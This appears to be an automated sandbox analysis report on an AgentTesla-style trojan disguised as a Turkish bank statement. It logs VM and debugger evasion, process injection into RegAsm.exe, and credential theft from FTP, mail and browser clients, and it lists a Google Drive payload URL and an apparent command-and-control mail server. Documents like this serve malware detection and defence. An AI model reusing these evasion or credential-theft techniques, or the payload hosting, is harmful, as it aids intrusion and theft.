            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1R606THBBUXRI8JJ5HXDYVI0FAWYPAMM9WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974973729.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974415755.00000000006E3000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974973729.0000000002260000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4944Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeSystem information queried: ModuleInformation
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974973729.0000000002260000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: RegAsm.exe, 00000006.00000002.116535615149.0000000000770000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974973729.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: RegAsm.exe, 00000006.00000002.116535615149.0000000000770000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@j
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000002.111974415755.00000000006E3000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00116950 KiUserExceptionDispatcher,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 560000
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
            Source: RegAsm.exe, 00000006.00000002.116537659596.0000000000ED1000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000006.00000002.116537659596.0000000000ED1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000006.00000002.116537659596.0000000000ED1000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000006.00000002.116537659596.0000000000ED1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 388, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 388, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 388, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Hesap Hareketleri 28-09-2021.exe27%ReversingLabsWin32.Trojan.Generic
            Hesap Hareketleri 28-09-2021.exe100%AviraTR/Injector.lnjwp

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.0.Hesap Hareketleri 28-09-2021.exe.400000.0.unpack100%AviraTR/Injector.lnjwpDownload File

            Domains

            SourceDetectionScannerLabelLink
            mail.brimaq.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://xIzTkA.com0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://mail.brimaq.com0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://12jxJNEdrHvv9foosbQ.com0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0#0%Avira URL Cloudsafe
            http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.brimaq.com
            78.128.8.31
            truetrueunknown
            drive.google.com
            216.58.212.174
            truefalse
              high
              googlehosted.l.googleusercontent.com
              216.58.212.161
              truefalse
                high
                doc-0o-50-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7liasrjha8jdur2ta6pltlarcg/1632809700000/00519186742208262786/*/1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSRegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://xIzTkA.comRegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7lRegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmpfalse
                      high
                      http://cps.letsencrypt.org0RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://doc-0o-50-docs.googleusercontent.com/RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                        high
                        https://drive.google.com/RegAsm.exe, 00000006.00000002.116534991391.00000000006FA000.00000004.00000020.sdmpfalse
                          high
                          http://x1.c.lencr.org/0RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.i.lencr.org/0RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.brimaq.comRegAsm.exe, 00000006.00000002.116547302191.000000001D70E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://r3.o.lencr.org0RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://12jxJNEdrHvv9foosbQ.comRegAsm.exe, 00000006.00000002.116547448568.000000001D732000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000003.112858930394.00000000009D1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000006.00000002.116546745972.000000001D69E000.00000004.00000001.sdmpfalse
                            high
                            https://doc-0o-50-docs.googleusercontent.com/WRegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                              high
                              https://drive.google.com/&RegAsm.exe, 00000006.00000002.116534991391.00000000006FA000.00000004.00000020.sdmpfalse
                                high
                                http://r3.i.lencr.org/0#RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://cps.root-x1.letsencrypt.org0RegAsm.exe, 00000006.00000002.116553077151.000000001F85D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                216.58.212.161
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse
                                78.128.8.31
                                mail.brimaq.comBulgaria
                                31083TELEPOINTBGtrue
                                216.58.212.174
                                drive.google.comUnited States
                                15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:1379
                                Start date:28.09.2021
                                Start time:08:13:18
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Hesap Hareketleri 28-09-2021.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.82.19.171, 67.26.137.254, 8.248.119.254, 8.253.95.249, 8.248.139.254, 8.253.204.121, 20.82.210.154, 104.89.41.209, 8.253.95.121, 8.248.145.254, 8.248.131.254, 8.248.115.254, 8.253.207.120
                                • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu-shim.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, e15275.g.akamaiedge.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wdcpalt.microsoft.com, wildcard.weather.microsoft.com.edgekey.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:16:07API Interceptor2624x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                78.128.8.31184285013-044310-sanlccjavap0003-7069_pdf (4).exeGet hashmaliciousBrowse
                                  BL.exeGet hashmaliciousBrowse
                                    hesaphareketi-01.exeGet hashmaliciousBrowse
                                      RFQ SMK_BNLDU20.exeGet hashmaliciousBrowse
                                        Dekont-20210818YPT21-190360.exeGet hashmaliciousBrowse
                                          ez0yYNLkd0vHtUs.exeGet hashmaliciousBrowse
                                            Remesas Aceptadas.exeGet hashmaliciousBrowse
                                              Remesas Aceptadas.exeGet hashmaliciousBrowse
                                                BBVA FINANCIACION ICO (BZG14963).exeGet hashmaliciousBrowse
                                                  Facturas Pagadas al Vencimien .exeGet hashmaliciousBrowse
                                                    yYiilcWBycgmt1Y.exeGet hashmaliciousBrowse
                                                      Ksfbbs3o6PKT29t.exeGet hashmaliciousBrowse
                                                        SWIFT.exeGet hashmaliciousBrowse
                                                          6b1mK8pGDjFiOSp.exeGet hashmaliciousBrowse
                                                            U3aegxG3WENvgrK.exeGet hashmaliciousBrowse
                                                              Best price offer.exeGet hashmaliciousBrowse
                                                                Purchase Order No. XDK-201103-004.exeGet hashmaliciousBrowse
                                                                  Purchase Order No. XDK-201103-004.exeGet hashmaliciousBrowse
                                                                    Hesap Hareketleri 05-08-2021.exeGet hashmaliciousBrowse
                                                                      Demande de devis (GUICHON 080421).exeGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        TELEPOINTBGNew purchase order docs....pdf...exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        New purchase order docs.........pdf.exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        Scan copy. pdf.........................................exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        184285013-044310-sanlccjavap0003-7069_pdf (4).exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        BL.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        Po copy. pdf......................................................................exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        PO docs. PDF...................................................................................exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        RFQ SMK_BNLDU20.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        .........exeGet hashmaliciousBrowse
                                                                        • 78.142.63.38
                                                                        Dekont-20210818YPT21-190360.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        YAl5rvRVTH.exeGet hashmaliciousBrowse
                                                                        • 78.142.63.214
                                                                        ez0yYNLkd0vHtUs.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        Remesas Aceptadas.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        Remesas Aceptadas.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        BBVA FINANCIACION ICO (BZG14963).exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        Facturas Pagadas al Vencimien .exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        yYiilcWBycgmt1Y.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        Ksfbbs3o6PKT29t.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31
                                                                        SWIFT.exeGet hashmaliciousBrowse
                                                                        • 78.128.8.31

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19InvPixcareer.-289609891_20210927.xlsbGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        RCnbEaKhdD.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        X9iTxI3QtS.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        lcZoxd23lU.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        eh1Jd9oktL.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        Gbb8oluLdo.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
